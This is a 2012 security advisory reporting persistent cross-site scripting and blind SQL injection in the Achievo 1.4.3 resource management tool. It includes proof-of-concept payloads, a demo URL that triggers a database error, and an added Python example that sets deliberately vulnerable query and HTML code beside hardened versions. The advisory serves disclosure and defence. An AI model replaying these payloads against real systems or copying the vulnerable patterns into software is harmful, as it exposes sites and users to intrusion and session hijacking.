Title:
======
Achievo v1.4.3 - Multiple Web Vulnerabilities


Date:
=====
2012-01-30


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=403


VL-ID:
=====
403

Introduction:
=============
Achievo is a flexible web-based resource management tool for business environments.
Achievo's resource management capabilities will enable organisations to support their business
processes in a simple, but effective manner.

A solution that fits seamlessly to the wishes of every organisation and offers the possibility
and freedom to adapt the functionality to the needs of the organisation. It will fit into every
organisation because Achievo is extremely easy to change to your specific situation.

(Copy of the Vendor Website: http://www.achievo.nl/product/ )

Abstract:
=========
Vulnerability-Lab Team (Chokri B.A.) discovered Multiple Web Vulnerabilities on the resource management tool Achievo v1.4.3.


Report-Timeline:
================
2012-01-30: Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
High

Details:
========
Multiple persistent cross site scripting vulnerabilities & a blind SQL injection vulnerability are detected on the resource management tool Achievo v1.4.3.
The bugs allow a remote attacker to inject malicious script code on the application side and/or to execute SQL commands via
a remote SQL injection attack.
Successful exploitation of the vulnerabilities allows an attacker to manipulate specific modules & can
lead to session hijacking (user/mod/admin) and/or to compromise the application & DBMS.


Vulnerable Module(s):
[+] Users preferences
[+] Projects
[+] Download vcard ( SQLi )

Picture(s):
../1.jpg
../2.jpg

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with low required user interaction. For demonstration or reproduce ...

1.
<select class="atkManyToOneRelation" name="atksearch_AE_coordinator_AE_coordinator[]"><option value="">Search all
</option><option value="__NONE__">Nothing selected</option><option value="1
" >"><img src=image.jpg onerror=alert(123); /> [X]
, test (manager)</option><option value="2" >

2.
<td valign="top" class="fieldlabel"><b>Project:</b> </td>
<td valign="top" class="field" >
"><img src: "><img src=image.jpg onerror=alert(1234); /> [X]
</td></tr>

3.
http://www.achievo.nl/demos/achievo/stable/dispatch.php?atkaction=vcard&atklevel=1&atkprevlevel=0&atkstackid=4f2467eae0518&id=3'

Critical: Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1).
Halted
error: [+0.19090s / 0.00036s] Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1)
Halted...

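The two flaw classes in the Details and Proof of Concept sections above share one root cause each: untrusted input written into a SQL string (the vcard `id` parameter, which produces the echoed MySQL error 1064) and stored field values written into HTML unencoded (the coordinator name and project field). The following is an added example, not Achievo's code and not part of the advisory, showing each vulnerable pattern next to its hardened form. It uses an in-memory SQLite table standing in for Achievo's person table; the schema, the column list and every function name are assumptions made for the demonstration. The payloads are the ones quoted in the proof of concept, used here only as inputs the hardened code must render inert.

```python
"""Added example (not Achievo's code): the two defensive patterns that close the
classes of flaw reported in the advisory. An in-memory SQLite table stands in
for the person table that Achievo's vcard query reads; the schema, the column
list and every function name here are assumptions for the demonstration."""
import html
import sqlite3

# Payloads quoted from the advisory's proof of concept; they are used only as
# inputs that the hardened code must render inert.
XSS_PAYLOAD = '"><img src=image.jpg onerror=alert(123); />'
SQLI_PAYLOAD = "3'"


def make_db():
    """Constructed sample data standing in for Achievo's person table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE person (id INTEGER, role TEXT, lastname TEXT, contact TEXT)"
    )
    conn.executemany(
        "INSERT INTO person VALUES (?, ?, ?, ?)",
        [(1, "manager", "test", "contact"), (3, "employee", "smith", "contact")],
    )
    return conn


def vcard_lookup_vulnerable(conn, raw_id):
    """The pattern behind the advisory's MySQL error 1064: the id parameter is
    concatenated into the query, so a quote in it becomes SQL syntax."""
    sql = (
        "SELECT id, lastname FROM person WHERE id='" + raw_id
        + "' ORDER BY person.role, person.lastname"
    )
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Achievo echoed the DBMS error to the page; mirroring that shows what
        # a single quote reveals to whoever sent it.
        return "Critical: Unknown error: " + str(exc)


def vcard_lookup_safe(conn, raw_id):
    """Hardened form: validate the expected type, then bind the value as a
    parameter so the database never parses it as query text."""
    if not raw_id.isdigit():
        return []  # reject rather than echo a DBMS error
    sql = "SELECT id, lastname FROM person WHERE id=? ORDER BY person.role, person.lastname"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def render_option_vulnerable(value, label):
    """Mirrors the captured <option> markup in the advisory: the stored name is
    written into the page unencoded, so markup inside it is rendered live."""
    return '<option value="%s">%s</option>' % (value, label)


def render_option_safe(value, label):
    """Hardened form: HTML-encode both the attribute and the text node, with
    quote=True so a stored value cannot break out of the value attribute."""
    return '<option value="%s">%s</option>' % (
        html.escape(value, quote=True),
        html.escape(label, quote=True),
    )


if __name__ == "__main__":
    db = make_db()
    print(vcard_lookup_vulnerable(db, SQLI_PAYLOAD))  # leaks a syntax error
    print(vcard_lookup_safe(db, SQLI_PAYLOAD))        # []
    print(vcard_lookup_safe(db, "3"))                 # [(3, 'smith')]
    print(render_option_vulnerable("1", XSS_PAYLOAD))
    print(render_option_safe("1", XSS_PAYLOAD))
```

Running it shows the contrast the advisory's error output implies: the concatenated query turns `3'` into a syntax error that is echoed back, while the bound parameter simply matches no row, and the encoded option text contains `&lt;img` instead of a live `<img` tag. The `isdigit()` check is defence in depth; the parameter binding alone already stops the injection.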
Risk:
=====
1.1
The security risk of the persistent XSS vulnerabilities is estimated as medium(+).

1.2
The security risk of the blind SQL injection vulnerabilities is estimated as high(+).

Credits:
========
Vulnerability Research Laboratory - Chokri B.A (Me!ster)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab


--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com